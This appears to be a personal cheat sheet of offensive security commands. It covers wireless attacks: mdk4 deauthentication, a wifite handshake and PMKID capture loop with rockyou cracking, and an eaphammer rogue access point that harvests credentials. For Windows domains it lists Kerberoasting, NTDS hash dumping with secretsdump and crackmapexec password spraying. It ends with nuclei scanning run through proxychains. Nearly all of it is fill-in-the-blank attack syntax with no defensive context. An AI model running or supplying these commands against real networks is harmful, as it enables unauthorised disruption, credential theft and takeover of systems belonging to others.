Just some cheat sheets for things I sometimes forget the syntax for.


  • airodump-ng --band abg --wps --showack --ignore-negative-one --beacons --write (unknown) {inet}
  • mdk4 {inet} d -w {whitelist filename} -c h:1200 -s 20 -x
  • service NetworkManager stop; service wpa_supplicant stop; service networking stop; killall wpa_supplicant; for i in `iw dev |grep -i interface |awk '{print $2}'`; do ip link set $i down; iw $i set monitor control; ip link set $i up; xterm -hold -e 'wifite -p 120 --new-hs --dict /usr/share/wordlists/rockyou.txt --pmkid-timeout 300 -inf -mac -ic --skip-crack -i $i' ; done
  • eaphammer --bssid {bssid} --essid {essid} --channel {CH} --wpa 2 --auth wpa-eap --interface {inet} --creds

Windows Environments

  • impacket-GetUserSPNs -target-domain {domain} -usersfile {file containing users to request SPNs for} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP}
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request {domain}/{login}:{pass}@{target IP} # this should grab whatever SPNs are available
  • impacket-GetUserSPNs -target-domain {domain} -dc-ip {dcip} -request -request-user {specific user} {domain}/{login}:{pass}@{target IP}
  • impacket-secretsdump -system ../registry/SYSTEM -security ../registry/SECURITY -ntds ntds.dit local
  • crackmapexec smb {target} -u '' -p '' --shares
  • crackmapexec smb {target} -u {login/userlist} -p {pass/passlist} --users


~~~Use a config file~~~


  • nuclei {target}
  • nuclei -t {template(s) to use} {target}
  • echo {target} | nuclei
  • proxychains -q amass enum -d {target} |proxychains -q /root/go/bin/httpx -ports 5000,8443,9443,10000,8080,9323,2375,2376,8000,80,443,9443,7547,10250,6443 -silent| proxychains -q /root/go/bin/nuclei >> nuclei-out.log